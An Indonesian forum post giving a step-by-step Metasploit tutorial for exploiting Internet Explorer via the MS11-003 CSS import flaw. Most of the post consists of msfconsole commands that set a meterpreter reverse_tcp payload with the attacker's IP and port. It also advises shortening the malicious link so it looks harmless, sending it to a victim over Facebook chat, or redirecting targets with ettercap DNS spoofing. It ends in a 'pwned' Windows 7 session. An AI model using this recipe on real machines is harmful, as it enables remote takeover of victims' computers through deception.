exploit ms11_033_ie_css_import
#1
ini sih sebenernya akal akalan nya si bleki orion , tapi ilmu emang buat dishare kok :d

langsung aja tutorial nya , maap berantakan
exploit ini memanfaatkan kelemahan browser IE om , windows 7 bisa lah , tergantung kitanya sang attacker =))

pertama jelas buka termanal dong

1. buka msfconsole ,, terserah sih mau pake armitage ato msfgui , lanjut masukkan command command nya bro.

msf > use exploit/windows/browser/ms11_003_ie_css_import

[Image: 0o6izaax7dbyk346g.jpg?size_id=5]

2. lalu set payload nya , disini ane pake meterpreter/reverse_tcp

msf exploit(ms11_003_ie_css_import) > set payload windows/meterpreter/reverse_tcp

[Image: q7vl0hf3rfwls5z6g.jpg]

3. set ip LHOST nya , LHOST disini adalah ip ATTACKER dilanjutkan set URIPATH nya

msf exploit(ms11_003_ie_css_import) > set LHOST 192.168.151.14

msf exploit(ms11_003_ie_css_import) > set URIPATH /

[Image: bg8c59ptz3eqtcd6g.jpg]

4. nah , yang ini terserah , untuk SRVPORT nya bisa make port yang belum kepakai , misal ane pakai port 8080 yang nanti akan ane convert link nya supaya gak ketahuan , kan aneh kalo ngasih link ada port 8080 nya.

Sebenernya bisa lebih mudah pakai port 80 , jadi kita tinggal arah kan TARGET ke ip kita makek ettercap dengan plugins dns_spoof. Tapi berhubung pas bikin nih tutor ane lagi chatting dipesbuk ya maka kepakailah port 80 tersebut.

Paham bro ? kalo nggak paham ya berarti sama , ane juga gak paham =))

msf exploit(ms11_003_ie_css_import) > set SRVPORT 8080

[Image: tutt.png]

5. Lanjut kita exploit

[Image: uqb6ho1b09e1c9x6g.jpg]

6. nah , http://192.168.151.14:8080
intinya bagaimana pun cara nya kita harus bisa mancing target buat buka tuh ip dengan port 8080 dll dengan browser internet explorer.

7. Disini ane pake teknik soceng sedikit , kita convert tuh link pake pendek.in

[Image: 11hv2156l4gjj176g.jpg]

8. Oke , setelah dipendekin , link nya berubah , jadi gak mencurigakan , selanjut nya kasih ke target bisa melalui apa kek , chat pesbuk misal nya , pikir sendiri yah.

[Image: e3nvkbk381qt3ih6g.jpg]

9. saat target membuka link tersebut dengan browser IE akan terlihat seperti SS berikut.

[Image: 9tvogrx2jlmdjht6g.jpg]

10. Nah...seperti Ss diatas , terlihat kata "meterpreter session 1 opened"

[Image: u6cwxdowlyyjdx96g.jpg]

coba di enter trus kita interaksi dengan meterpreter id 1

[Image: z4c4dvui4tni4cl6g.jpg]

nah , masuk sesi meterpreter , mari kita lihat info O.S nya

[Image: ctlwtozbxs468yl6g.jpg]

ckck windows 7 pwned :-?

ok, sekian tutorial dari saya , saya larcenciels ganteng mohon undur diri , sekian dan terimagaji =))


Messages In This Thread
exploit ms11_033_ie_css_import - by larcenciels - 04-26-2013, 02:50 PM
RE: exploit ms11_033_ie_css_import - by pemula - 05-26-2013, 02:15 PM




Users browsing this thread: 1 Guest(s)